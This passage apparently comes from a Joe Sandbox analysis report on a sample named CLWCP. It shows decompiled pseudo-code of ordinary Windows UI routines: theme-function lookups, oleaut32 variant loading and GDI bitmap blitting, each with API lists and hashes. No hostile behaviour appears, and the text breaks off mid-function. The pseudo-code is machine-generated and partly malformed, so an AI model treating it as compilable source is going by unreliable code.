                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 00427340
                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 00427352
                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 00427364
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 00427376
                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 00427388
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042739A
                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 004273AC
                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 004273BE
                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 004273D0
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 004273E2
                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 004273F4
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00427406
                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00427418
                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042742A
                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042743C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042744E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 00427460
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 00427472
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 00427484
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 00427496
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 004274A8
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 004274BA
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 004274CC
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 004274DE
                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 004274F0
                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 00427502
                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00427514
                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 00427526
                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 00427538
                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042754A
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042755C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042756E
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00427580
                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 00427592
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 54%
                                  			E0041EE84(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, char _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                  				int _v8;
                                  				int _v12;
                                  				char _v13;
                                  				struct HDC__* _v20;
                                  				void* _v24;
                                  				void* _v28;
                                  				char _v32;
                                  				long _v36;
                                  				intOrPtr _v40;
                                  				intOrPtr* _t78;
                                  				intOrPtr _t87;
                                  				struct HDC__* _t88;
                                  				intOrPtr _t91;
                                  				struct HDC__* _t92;
                                  				struct HDC__* _t135;
                                  				int _t161;
                                  				intOrPtr _t169;
                                  				intOrPtr _t173;
                                  				struct HDC__* _t175;
                                  				int _t177;
                                  				void* _t179;
                                  				void* _t180;
                                  				intOrPtr _t181;
                                  
                                  				_t179 = _t180;
                                  				_t181 = _t180 + 0xffffffdc;
                                  				_v12 = __ecx;
                                  				_v8 = __edx;
                                  				_t175 = __eax;
                                  				_t177 = _a16;
                                  				_t161 = _a20;
                                  				_v13 = 1;
                                  				_t78 =  *0x46fdbc; // 0x46e0c4
                                  				if( *_t78 != 2 || _t161 != _a40 || _t177 != _a36) {
                                  					_v40 = 0;
                                  					_push(0);
                                  					L00406374();
                                  					_v20 = E0041ECD4(0);
                                  					_push(_t179);
                                  					_push(0x41f10a);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t181;
                                  					_push(_t177);
                                  					_push(_t161);
                                  					_push(_a32);
                                  					L0040636C();
                                  					_v24 = E0041ECD4(_a32);
                                  					_v28 = SelectObject(_v20, _v24);
                                  					_push(0);
                                  					_t87 =  *0x470898; // 0xad0807a3
                                  					_push(_t87);
                                  					_t88 = _a32;
                                  					_push(_t88);
                                  					L004064E4();
                                  					_v40 = _t88;
                                  					_push(0);
                                  					_push(_v40);
                                  					_push(_a32);
                                  					L004064E4();
                                  					if(_v40 == 0) {
                                  						_push(0xffffffff);
                                  						_t91 =  *0x470898; // 0xad0807a3
                                  						_push(_t91);
                                  						_t92 = _v20;
                                  						_push(_t92);
                                  						L004064E4();
                                  						_v40 = _t92;
                                  					} else {
                                  						_push(0xffffffff);
                                  						_push(_v40);
                                  						_t135 = _v20;
                                  						_push(_t135);
                                  						L004064E4();
                                  						_v40 = _t135;
                                  					}
                                  					_push(_v20);
                                  					L004064B4();
                                  					StretchBlt(_v20, 0, 0, _t161, _t177, _a12, _a8, _a4, _t161, _t177, 0xcc0020);
                                  					_t49 =  &_a24; // 0x41e34a
                                  					StretchBlt(_v20, 0, 0, _t161, _t177, _a32, _a28,  *_t49, _t161, _t177, 0x440328);
                                  					_v32 = SetTextColor(_t175, 0);
                                  					_v36 = SetBkColor(_t175, 0xffffff);
                                  					StretchBlt(_t175, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t161, _t177, 0x8800c6);
                                  					StretchBlt(_t175, _v8, _v12, _a40, _a36, _v20, 0, 0, _t161, _t177, 0x660046);
                                  					_t67 =  &_v32; // 0x41e34a
                                  					SetTextColor(_t175,  *_t67);
                                  					SetBkColor(_t175, _v36);
                                  					if(_v28 != 0) {
                                  						SelectObject(_v20, _v28);
                                  					}
                                  					DeleteObject(_v24);
                                  					_pop(_t169);
                                  					 *[fs:eax] = _t169;
                                  					_push(0x41f111);
                                  					if(_v40 != 0) {
                                  						_push(0);
                                  						_push(_v40);
                                  						_push(_v20);
                                  						L004064E4();
                                  					}
                                  					return DeleteDC(_v20);
                                  				} else {
                                  					_push(1);
                                  					_push(1);
                                  					_push(_a32);
                                  					L0040636C();
                                  					_v24 = E0041ECD4(_a32);
                                  					_v24 = SelectObject(_a12, _v24);
                                  					_push(_t179);
                                  					_push(0x41ef5d);
                                  					_push( *[fs:ecx]);
                                  					 *[fs:ecx] = _t181;
                                  					_t16 =  &_a24; // 0x41e34a
                                  					MaskBlt(_t175, _v8, _v12, _a40, _a36, _a32, _a28,  *_t16, _v24, _a8, _a4, 0xaa0029);
                                  					_pop(_t173);
                                  					 *[fs:eax] = _t173;
                                  					_push(0x41f111);
                                  					_v24 = SelectObject(_a12, _v24);
                                  					return DeleteObject(_v24);
                                  				}
                                  			}



























                                  APIs
                                  • 72E7A520.GDI32(?,00000001,00000001,00000000,?,?), ref: 0041EEC7
                                  • SelectObject.GDI32(?,?), ref: 0041EEDC
                                  • MaskBlt.GDI32(?,?,?,?,?,?,00000000,JA,?,?,?,00AA0029,00000000,0041EF5D,?,?), ref: 0041EF31
                                  • SelectObject.GDI32(?,?), ref: 0041EF4B
                                  • DeleteObject.GDI32(?), ref: 0041EF57
                                  • 72E7A590.GDI32(00000000,00000000,?,?), ref: 0041EF6B
                                  • 72E7A520.GDI32(?,?,?,00000000,0041F10A,?,00000000,00000000,?,?), ref: 0041EF8C
                                  • SelectObject.GDI32(?,?), ref: 0041EFA1
                                  • 72E7B410.GDI32(?,AD0807A3,00000000,?,?,?,?,?,00000000,0041F10A,?,00000000,00000000,?,?), ref: 0041EFB5
                                  • 72E7B410.GDI32(?,?,00000000,?,AD0807A3,00000000,?,?,?,?,?,00000000,0041F10A,?,00000000,00000000), ref: 0041EFC7
                                  • 72E7B410.GDI32(?,00000000,000000FF,?,?,00000000,?,AD0807A3,00000000,?,?,?,?,?,00000000,0041F10A), ref: 0041EFDC
                                  • 72E7B410.GDI32(?,AD0807A3,000000FF,?,?,00000000,?,AD0807A3,00000000,?,?,?,?,?,00000000,0041F10A), ref: 0041EFF2
                                  • 72E7B150.GDI32(?,?,AD0807A3,000000FF,?,?,00000000,?,AD0807A3,00000000,?,?,?,?,?,00000000), ref: 0041EFFE
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0041F020
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,JA,?,?,00440328), ref: 0041F042
                                  • SetTextColor.GDI32(?,00000000), ref: 0041F04A
                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 0041F058
                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0041F084
                                  • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0041F0A9
                                  • SetTextColor.GDI32(?,JA), ref: 0041F0B3
                                  • SetBkColor.GDI32(?,00000000), ref: 0041F0BD
                                  • SelectObject.GDI32(?,00000000), ref: 0041F0D0
                                  • DeleteObject.GDI32(?), ref: 0041F0D9
                                  • 72E7B410.GDI32(?,00000000,00000000,0041F111,?,JA,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0041F0FB
                                  • DeleteDC.GDI32(?), ref: 0041F104
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                  • String ID: JA$JA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040DB60() {
                                  				struct HINSTANCE__* _v8;
                                  				intOrPtr _t46;
                                  				void* _t91;
                                  
                                  				_v8 = GetModuleHandleA("oleaut32.dll");
                                  				 *0x4707a4 = E0040DB34("VariantChangeTypeEx", E0040D6CC, _t91);
                                  				 *0x4707a8 = E0040DB34("VarNeg", E0040D6FC, _t91);
                                  				 *0x4707ac = E0040DB34("VarNot", E0040D6FC, _t91);
                                  				 *0x4707b0 = E0040DB34("VarAdd", E0040D708, _t91);
                                  				 *0x4707b4 = E0040DB34("VarSub", E0040D708, _t91);
                                  				 *0x4707b8 = E0040DB34("VarMul", E0040D708, _t91);
                                  				 *0x4707bc = E0040DB34("VarDiv", E0040D708, _t91);
                                  				 *0x4707c0 = E0040DB34("VarIdiv", E0040D708, _t91);
                                  				 *0x4707c4 = E0040DB34("VarMod", E0040D708, _t91);
                                  				 *0x4707c8 = E0040DB34("VarAnd", E0040D708, _t91);
                                  				 *0x4707cc = E0040DB34("VarOr", E0040D708, _t91);
                                  				 *0x4707d0 = E0040DB34("VarXor", E0040D708, _t91);
                                  				 *0x4707d4 = E0040DB34("VarCmp", E0040D714, _t91);
                                  				 *0x4707d8 = E0040DB34("VarI4FromStr", E0040D720, _t91);
                                  				 *0x4707dc = E0040DB34("VarR4FromStr", E0040D78C, _t91);
                                  				 *0x4707e0 = E0040DB34("VarR8FromStr", E0040D7F8, _t91);
                                  				 *0x4707e4 = E0040DB34("VarDateFromStr", E0040D864, _t91);
                                  				 *0x4707e8 = E0040DB34("VarCyFromStr", E0040D8D0, _t91);
                                  				 *0x4707ec = E0040DB34("VarBoolFromStr", E0040D93C, _t91);
                                  				 *0x4707f0 = E0040DB34("VarBstrFromCy", E0040D9BC, _t91);
                                  				 *0x4707f4 = E0040DB34("VarBstrFromDate", E0040DA2C, _t91);
                                  				_t46 = E0040DB34("VarBstrFromBool", E0040DAA0, _t91);
                                  				 *0x4707f8 = _t46;
                                  				return _t46;
                                  			}







                                  APIs
                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040DB69
                                    • Part of subcall function 0040DB34: GetProcAddress.KERNEL32(00000000), ref: 0040DB4D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E004225B8(void* __eax, long __ecx, intOrPtr __edx) {
                                  				void* _v8;
                                  				intOrPtr _v12;
                                  				struct HDC__* _v16;
                                  				struct HDC__* _v20;
                                  				char _v21;
                                  				void* _v28;
                                  				void* _v32;
                                  				intOrPtr _v92;
                                  				intOrPtr _v96;
                                  				int _v108;
                                  				int _v112;
                                  				void _v116;
                                  				void* _t64;
                                  				int _t65;
                                  				intOrPtr _t66;
                                  				long _t77;
                                  				void* _t107;
                                  				intOrPtr _t116;
                                  				intOrPtr _t117;
                                  				long _t120;
                                  				intOrPtr _t123;
                                  				void* _t127;
                                  				void* _t129;
                                  				intOrPtr _t130;
                                  
                                  				_t127 = _t129;
                                  				_t130 = _t129 + 0xffffff90;
                                  				_t120 = __ecx;
                                  				_t123 = __edx;
                                  				_t107 = __eax;
                                  				_v8 = 0;
                                  				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                                  					return _v8;
                                  				} else {
                                  					E00421AAC(_t107);
                                  					_v12 = 0;
                                  					_v20 = 0;
                                  					_push(_t127);
                                  					_push(0x4227b3);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t130;
                                  					_push(0);
                                  					L004066E4();
                                  					_v12 = E0041ECD4(0);
                                  					_push(_v12);
                                  					L00406374();
                                  					_v20 = E0041ECD4(_v12);
                                  					_push(0);
                                  					_push(1);
                                  					_push(1);
                                  					_push(_v108);
                                  					_t64 = _v112;
                                  					_push(_t64);
                                  					L0040635C();
                                  					_v8 = _t64;
                                  					if(_v8 == 0) {
                                  						L17:
                                  						_t65 = 0;
                                  						_pop(_t116);
                                  						 *[fs:eax] = _t116;
                                  						_push(0x4227ba);
                                  						if(_v20 != 0) {
                                  							_t65 = DeleteDC(_v20);
                                  						}
                                  						if(_v12 != 0) {
                                  							_t66 = _v12;
                                  							_push(_t66);
                                  							_push(0);
                                  							L00406944();
                                  							return _t66;
                                  						}
                                  						return _t65;
                                  					} else {
                                  						_v32 = SelectObject(_v20, _v8);
                                  						if(__ecx != 0x1fffffff) {
                                  							_push(_v12);
                                  							L00406374();
                                  							_v16 = E0041ECD4(_v12);
                                  							_push(_t127);
                                  							_push(0x42276b);
                                  							_push( *[fs:eax]);
                                  							 *[fs:eax] = _t130;
                                  							if(_v96 == 0) {
                                  								_v21 = 0;
                                  							} else {
                                  								_v21 = 1;
                                  								_v92 = 0;
                                  								_t107 = E00421EF0(_t107, _t123, _t123, 0,  &_v116);
                                  							}
                                  							_v28 = SelectObject(_v16, _t107);
                                  							if(_t123 != 0) {
                                  								_push(0);
                                  								_push(_t123);
                                  								_push(_v16);
                                  								L004064E4();
                                  								_push(_v16);
                                  								L004064B4();
                                  								_push(0);
                                  								_push(_t123);
                                  								_push(_v20);
                                  								L004064E4();
                                  								_push(_v20);
                                  								L004064B4();
                                  							}
                                  							_t77 = SetBkColor(_v16, _t120);
                                  							_push(0xcc0020);
                                  							_push(0);
                                  							_push(0);
                                  							_push(_v16);
                                  							_push(_v108);
                                  							_push(_v112);
                                  							_push(0);
                                  							_push(0);
                                  							_push(_v20);
                                  							L0040634C();
                                  							SetBkColor(_v16, _t77);
                                  							if(_v28 != 0) {
                                  								SelectObject(_v16, _v28);
                                  							}
                                  							if(_v21 != 0) {
                                  								DeleteObject(_t107);
                                  							}
                                  							_pop(_t117);
                                  							 *[fs:eax] = _t117;
                                  							_push(0x422772);
                                  							return DeleteDC(_v16);
                                  						} else {
                                  							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                                  							if(_v32 != 0) {
                                  								SelectObject(_v20, _v32);
                                  							}
                                  							goto L17;
                                  						}
                                  					}
                                  				}
                                  			}


                                  APIs
                                  • GetObjectA.GDI32(00000000,00000054,?), ref: 004225DB
                                  • 72E7AC50.USER32(00000000,00000000,004227B3,?,00000000,00000054,?,00000000,?,?), ref: 00422609
                                  • 72E7A590.GDI32(?,00000000,00000000,004227B3,?,00000000,00000054,?,00000000,?,?), ref: 0042261A
                                  • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,004227B3,?,00000000,00000054,?,00000000,?,?), ref: 00422635
                                  • SelectObject.GDI32(?,00000000), ref: 0042264F
                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00422671
                                  • 72E7A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,004227B3,?,00000000,00000054,?), ref: 0042267F
                                  • SelectObject.GDI32(00000000,00000000), ref: 004226C7
                                  • 72E7B410.GDI32(00000000,?,00000000,00000000,00000000,00000000,0042276B,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 004226DA
                                  • 72E7B150.GDI32(00000000,00000000,?,00000000,00000000,00000000,00000000,0042276B,?,?,?,00000000,?,?,00000001,00000001), ref: 004226E3
                                  • 72E7B410.GDI32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,0042276B,?,?,?,00000000,?), ref: 004226EF
                                  • 72E7B150.GDI32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,0042276B,?,?,?,00000000), ref: 004226F8
                                  • SetBkColor.GDI32(00000000,00000000), ref: 00422702
                                  • 72E897E0.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,00000000,00000000,0042276B), ref: 00422726
                                  • SetBkColor.GDI32(00000000,00000000), ref: 00422730
                                  • SelectObject.GDI32(00000000,00000000), ref: 00422743
                                  • DeleteObject.GDI32(00000000), ref: 0042274F
                                  • DeleteDC.GDI32(00000000), ref: 00422765
                                  • SelectObject.GDI32(?,00000000), ref: 00422780
                                  • DeleteDC.GDI32(00000000), ref: 0042279C
                                  • 72E7B380.USER32(00000000,00000000,004227BA,00000001,00000000,?,00000000,00000000,004227B3,?,00000000,00000054,?,00000000,?,?), ref: 004227AD
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Object$Select$Delete$A590B150B410Color$A410B380E897
                                  • String ID:
                                  • API String ID: 4241548881-0
                                  • Opcode ID: 92b5d8956d827b566ecfb04ccea26f3f4d4d960e5afe805c8eae20835c3f9da9
                                  • Instruction ID: b1cbbc3a67424befefb4366d0554ae0d072720e7e2e4580c0d3ed9bb77c0ca3c
                                  • Opcode Fuzzy Hash: 92b5d8956d827b566ecfb04ccea26f3f4d4d960e5afe805c8eae20835c3f9da9
                                  • Instruction Fuzzy Hash: 7F513E71F04218BFDB10EBE9DC45FAEB7FCAB08704F51446AB614E7282D6B99940CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E004234B0(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, char* _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr* _v12;
                                  				void* _v16;
                                  				struct HDC__* _v20;
                                  				char _v24;
                                  				intOrPtr* _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				signed int _v37;
                                  				intOrPtr _v44;
                                  				void* _v48;
                                  				struct HDC__* _v52;
                                  				intOrPtr _v56;
                                  				intOrPtr* _v60;
                                  				intOrPtr* _v64;
                                  				signed short _v66;
                                  				signed short _v68;
                                  				signed short _v70;
                                  				signed short _v72;
                                  				void* _v76;
                                  				intOrPtr _v172;
                                  				char _v174;
                                  				intOrPtr _t150;
                                  				signed int _t159;
                                  				intOrPtr _t162;
                                  				void* _t165;
                                  				void* _t173;
                                  				void* _t182;
                                  				intOrPtr _t188;
                                  				struct HDC__* _t189;
                                  				struct HDC__* _t203;
                                  				signed int _t207;
                                  				signed int _t213;
                                  				intOrPtr _t240;
                                  				intOrPtr* _t244;
                                  				intOrPtr _t250;
                                  				intOrPtr _t289;
                                  				intOrPtr _t290;
                                  				intOrPtr _t295;
                                  				signed int _t297;
                                  				signed int _t317;
                                  				void* _t319;
                                  				void* _t320;
                                  				signed int _t321;
                                  				void* _t322;
                                  				void* _t323;
                                  				void* _t324;
                                  				intOrPtr _t325;
                                  
                                  				_t316 = __edi;
                                  				_t323 = _t324;
                                  				_t325 = _t324 + 0xffffff54;
                                  				_t319 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_v52 = 0;
                                  				_v44 = 0;
                                  				_v60 = 0;
                                  				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
                                  				_v37 = _v36 == 0xc;
                                  				if(_v37 != 0) {
                                  					_v36 = 0x28;
                                  				}
                                  				_v28 = E004026E4(_v36 + 0x40c);
                                  				_v64 = _v28;
                                  				_push(_t323);
                                  				_push(0x4239cb);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t325;
                                  				_push(_t323);
                                  				_push(0x42399e);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t325;
                                  				if(_v37 == 0) {
                                  					 *((intOrPtr*)( *_v12 + 0xc))();
                                  					_t320 = _t319 - _v36;
                                  					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                                  					if(_t150 != 3 && _t150 != 0) {
                                  						_v60 = E00403368(1);
                                  						if(_a4 == 0) {
                                  							E00402D4C( &_v174, 0xe);
                                  							_v174 = 0x4d42;
                                  							_v172 = _v36 + _t320;
                                  							_a4 =  &_v174;
                                  						}
                                  						 *((intOrPtr*)( *_v60 + 0x10))();
                                  						 *((intOrPtr*)( *_v60 + 0x10))();
                                  						 *((intOrPtr*)( *_v60 + 0x10))();
                                  						E00415DE0(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
                                  						 *((intOrPtr*)( *_v60 + 0x14))();
                                  						_v12 = _v60;
                                  					}
                                  				} else {
                                  					 *((intOrPtr*)( *_v12 + 0xc))();
                                  					_t250 = _v64;
                                  					E00402D4C(_t250, 0x28);
                                  					_t240 = _t250;
                                  					 *(_t240 + 4) = _v72 & 0x0000ffff;
                                  					 *(_t240 + 8) = _v70 & 0x0000ffff;
                                  					 *((short*)(_t240 + 0xc)) = _v68 & 0x0000ffff;
                                  					 *((short*)(_t240 + 0xe)) = _v66 & 0x0000ffff;
                                  					_t320 = _t319 - 0xc;
                                  				}
                                  				_t244 = _v64;
                                  				 *_t244 = _v36;
                                  				_v32 = _v28 + _v36;
                                  				if( *((short*)(_t244 + 0xc)) != 1) {
                                  					E0041EBB4();
                                  				}
                                  				if(_v36 == 0x28) {
                                  					_t213 =  *(_t244 + 0xe) & 0x0000ffff;
                                  					if(_t213 == 0x10 || _t213 == 0x20) {
                                  						if( *((intOrPtr*)(_t244 + 0x10)) == 3) {
                                  							E00415D70(_v12, 0xc, _v32);
                                  							_v32 = _v32 + 0xc;
                                  							_t320 = _t320 - 0xc;
                                  						}
                                  					}
                                  				}
                                  				if( *(_t244 + 0x20) == 0) {
                                  					 *(_t244 + 0x20) = E0041EE44( *(_t244 + 0xe) & 0x0000ffff);
                                  				}
                                  				_t317 = _v37 & 0x000000ff;
                                  				_t79 = _t317 + 0x46e6e4; // 0xc08b0304
                                  				E00415D70(_v12,  *(_t244 + 0x20) * ( *_t79 & 0x000000ff), _v32);
                                  				_t83 = _t317 + 0x46e6e4; // 0xc08b0304
                                  				_t321 = _t320 -  *(_t244 + 0x20) * ( *_t83 & 0x000000ff);
                                  				if( *(_t244 + 0x14) == 0) {
                                  					_t297 =  *(_t244 + 0xe) & 0x0000ffff;
                                  					_t207 = E0041EE64( *((intOrPtr*)(_t244 + 4)), 0x20, _t297);
                                  					asm("cdq");
                                  					 *(_t244 + 0x14) = _t207 * (( *(_t244 + 8) ^ _t297) - _t297);
                                  				}
                                  				_t159 =  *(_t244 + 0x14);
                                  				if(_t321 > _t159) {
                                  					_t321 = _t159;
                                  				}
                                  				if(_v37 != 0) {
                                  					_t159 = E0041F120(_v32);
                                  				}
                                  				_push(0);
                                  				L004066E4();
                                  				_v16 = E0041ECD4(_t159);
                                  				_push(_t323);
                                  				_push(0x423919);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t325;
                                  				_t162 =  *((intOrPtr*)(_v64 + 0x10));
                                  				if(_t162 == 0 || _t162 == 3) {
                                  					if( *0x46e454 == 0) {
                                  						_push(0);
                                  						_push(0);
                                  						_push( &_v24);
                                  						_push(0);
                                  						_push(_v28);
                                  						_t165 = _v16;
                                  						_push(_t165);
                                  						L0040637C();
                                  						_v44 = _t165;
                                  						if(_v44 == 0 || _v24 == 0) {
                                  							if(GetLastError() != 0) {
                                  								E0040CAFC();
                                  							} else {
                                  								E0041EBB4();
                                  							}
                                  						}
                                  						_push(_t323);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t325;
                                  						E00415D70(_v12, _t321, _v24);
                                  						_pop(_t289);
                                  						 *[fs:eax] = _t289;
                                  						_t290 = 0x4238e8;
                                  						 *[fs:eax] = _t290;
                                  						_push(0x423920);
                                  						_t173 = _v16;
                                  						_push(_t173);
                                  						_push(0);
                                  						L00406944();
                                  						return _t173;
                                  					} else {
                                  						goto L27;
                                  					}
                                  				} else {
                                  					L27:
                                  					_v20 = 0;
                                  					_v24 = E004026E4(_t321);
                                  					_push(_t323);
                                  					_push(0x423881);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t325;
                                  					E00415D70(_v12, _t321, _v24);
                                  					_push(_v16);
                                  					L00406374();
                                  					_v20 = E0041ECD4(_v16);
                                  					_push(1);
                                  					_push(1);
                                  					_t182 = _v16;
                                  					_push(_t182);
                                  					L0040636C();
                                  					_v48 = SelectObject(_v20, _t182);
                                  					_v56 = 0;
                                  					_t187 =  *((intOrPtr*)(_v64 + 0x20));
                                  					if( *((intOrPtr*)(_v64 + 0x20)) > 0) {
                                  						_v52 = E0041F3DC(0, _t187);
                                  						_push(0);
                                  						_push(_v52);
                                  						_t203 = _v20;
                                  						_push(_t203);
                                  						L004064E4();
                                  						_v56 = _t203;
                                  						_push(_v20);
                                  						L004064B4();
                                  					}
                                  					_push(_t323);
                                  					_push(0x423855);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t325;
                                  					_push(0);
                                  					_t188 = _v28;
                                  					_push(_t188);
                                  					_push(_v24);
                                  					_push(4);
                                  					_push(_t188);
                                  					_t189 = _v20;
                                  					_push(_t189);
                                  					L00406384();
                                  					_v44 = _t189;
                                  					if(_v44 == 0) {
                                  						if(GetLastError() != 0) {
